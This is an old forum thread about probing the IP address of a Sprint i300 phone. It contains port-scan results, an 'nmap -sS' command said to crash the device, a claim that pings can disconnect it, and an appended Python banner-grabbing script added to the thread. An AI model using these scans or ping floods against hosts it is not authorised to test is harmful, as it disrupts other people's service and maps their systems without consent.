Poll: how safe do you feel about the security of your i300?

  1. #1
    Registered User
    Join Date
    12-06-2001
    Posts
    2

    security && bringing your i300 to its knees...

    Greetings...

    The lure of having the ability to obtain a wireless connection to
    the internet has been the main reason I chose to purchase a 'smart
    phone'. Browsing web pages, checking email, and instant messaging
    are some of the really useful/useless features of these devices.

    I have been working to determine my host masks when on a
    data call. While toying, I have experienced the following:

    1) SuperScan has revealed some interesting ports open (not
    altogether reliable, but interesting nonetheless). These are certainly
    dependent on my provider, Spr1nt. (Further investigation will
    wait until I am on my nights/weekends time.) :P

    + XxX.xXx.XxX.xXx
    |___ 25 [smtp] Simple Mail Transfer
    |___ 80 [http] World Wide Web HTTP
    |___ 81 [hosts2-ns] HOSTS2 Name Server
    |___ 82 [xfer] XFER Utility
    |___ 83 [mit-ml-dev] MIT ML Device
    |___ 110 [pop3] Post Office Protocol - Version 3
    |___ 135 [epmap] DCE endpoint resolution
    |___ 139 [netbios-ssn] NETBIOS Session Service
    |___ 443 [https] https MCom
    |___ 445 [microsoft-ds] Microsoft-DS
    |___ 515 [printer] spooler
    |___ 1025 [blackjack] network blackjack
    |___ 1032 [iad3] BBN IAD
    |___ 1080 [socks] Socks
    |___ 5190 [aol] America-Online
    |___ 8080 [WWW-Proxy] Standard HTTP Proxy

    2) Using simple pings I can drastically slow the connection, if not disconnect the device.

    64 bytes from XX.xx.XX.xx: icmp_seq=45 ttl=244 time=5916.6 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=46 ttl=244 time=4920.0 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=47 ttl=244 time=4525.4 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=48 ttl=244 time=4519.4 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=49 ttl=244 time=3522.8 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=50 ttl=244 time=2526.2 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=51 ttl=244 time=5704.5 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=52 ttl=244 time=5634.2 ms
    64 bytes from XX.xx.XX.xx: icmp_seq=53 ttl=244 time=4637.6 ms

    3) nmap -vv -sS XxX.xXx.XxX.xXx
    This is the kicker: every time I initiate an nmap scan on my device it
    ends up bringing the device to its knees, then abruptly
    disconnecting!! On top of this, it seems that the device requires an
    idle time of roughly 3-4 minutes to allow for a reconnect.

    nmap output:

    adjust_timeout: packet supposedly had rtt of 22961439 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22963579 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22965729 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22967935 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22970094 microseconds. Ignoring time.
    adjust_timeout: packet supposedly had rtt of 22972246 microseconds. Ignoring time.

    So what does all this mean? Well, personally, being the paranoid
    individual I am, playing with this stuff is very interesting.

    What, if any, are the implications? That's left open for discussion.
    Anyone else who wants to help me investigate, please feel free to mail
    me with your results and/or flames.

    hack6500

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048


    Yo hack... I'd like to know more about what these parameters do... I have 10,000 minutes to play around with!

  3. #3
    Registered User
    Join Date
    11-07-2001
    Posts
    177

    Most likely a gateway device

    Based on the results that SuperScan is giving you, it would seem to me as though you're looking at a Windows box - not your actual phone. Port 445 is "NetBIOS-less file sharing" and is new in Windows 2000.

    Since your scan shows port 80 open on that device, what happens when you try to open a web connection? Even MORE interesting - since port 25 is open, what type of banner do you get if you telnet to port 25 on that IP? My guess is that you're not actually scanning your phone, but some sort of gateway device in between your phone and the Internet.

    -Doug
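The banner check Doug suggests (connect to 25 and 80, read what the service says about itself) as an added example; this is not code from the thread or from either poster. It grabs the SMTP greeting and the HTTP Server header from a host you name on the command line, then classifies them, and ships with constructed sample banners (the hostnames and version strings are made up, not captured from the original poster's provider) so the classifier can be exercised offline:

```python
"""Banner grab on ports 25 and 80 to tell a handset from a gateway in front of it.

Added example; the hosts, banners and classification rules are assumptions
made for illustration, not data from the thread.
"""
import re
import socket

SMTP_PORT = 25
HTTP_PORT = 80
TIMEOUT = 5.0  # carrier data links are slow, so be generous


def grab_banner(host: str, port: int, timeout: float = TIMEOUT) -> str:
    """Connect to host:port and return the first bytes the service sends.

    HTTP servers are silent until asked, so a HEAD request is sent on 80/8080;
    SMTP and most other services volunteer a greeting on connect.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port in (HTTP_PORT, 8080):
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode("ascii"))
        data = b""
        try:
            while len(data) < 2048:
                chunk = s.recv(1024)
                if not chunk:          # peer closed: banner is complete
                    break
                data += chunk
        except socket.timeout:         # service went quiet: keep what we have
            pass
    return data.decode("latin-1", "replace")


def classify_banner(port: int, banner: str) -> str:
    """Return a short hint about what answered on this port, from its banner."""
    text = banner.strip()
    if port == SMTP_PORT:
        m = re.match(r"220[ -](\S+)\s*(.*)", text)
        if not m:
            return "smtp: no 220 greeting (filtered, proxy or tarpit?)"
        hostname, rest = m.group(1), m.group(2)
        if "microsoft" in rest.lower():
            return f"smtp: Microsoft SMTP service on {hostname} (Windows box, not a handset)"
        return f"smtp: greeting from {hostname}: {rest[:60]}"
    if port in (HTTP_PORT, 8080):
        m = re.search(r"^Server:\s*(.+?)\r?$", text, re.I | re.M)
        if not m:
            return "http: reply with no Server header"
        server = m.group(1)
        if "iis" in server.lower():
            return f"http: {server} (IIS, a Windows box rather than the phone)"
        return f"http: {server}"
    return f"port {port}: {text[:60]!r}"


def fingerprint(host: str, ports=(SMTP_PORT, HTTP_PORT)) -> dict:
    """Grab and classify a banner per port; a failed connect becomes the hint."""
    out = {}
    for port in ports:
        try:
            out[port] = classify_banner(port, grab_banner(host, port))
        except OSError as exc:
            out[port] = f"port {port}: connect failed ({exc})"
    return out


# Constructed sample banners (made up for this example) so the classifier
# can be run without a live target.
SAMPLE_BANNERS = {
    25: "220 mailgw.example.net Microsoft ESMTP MAIL Service, Version: 5.0.2195.1600 ready\r\n",
    80: "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nContent-Type: text/html\r\n\r\n",
}


def classify_samples() -> dict:
    """Classify the constructed sample banners (offline run)."""
    return {port: classify_banner(port, b) for port, b in SAMPLE_BANNERS.items()}


if __name__ == "__main__":
    import sys
    results = fingerprint(sys.argv[1]) if len(sys.argv) > 1 else classify_samples()
    for port, hint in results.items():
        print(port, hint)
```

Run it with the IP from the SuperScan output as the only argument to probe for real; with no argument it prints the classification of the sample banners. If the greeting on 25 or the Server header on 80 names a Windows mail or web server, the scanned address is almost certainly the carrier's gateway rather than the phone, which is the distinction the reply is asking the poster to check.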
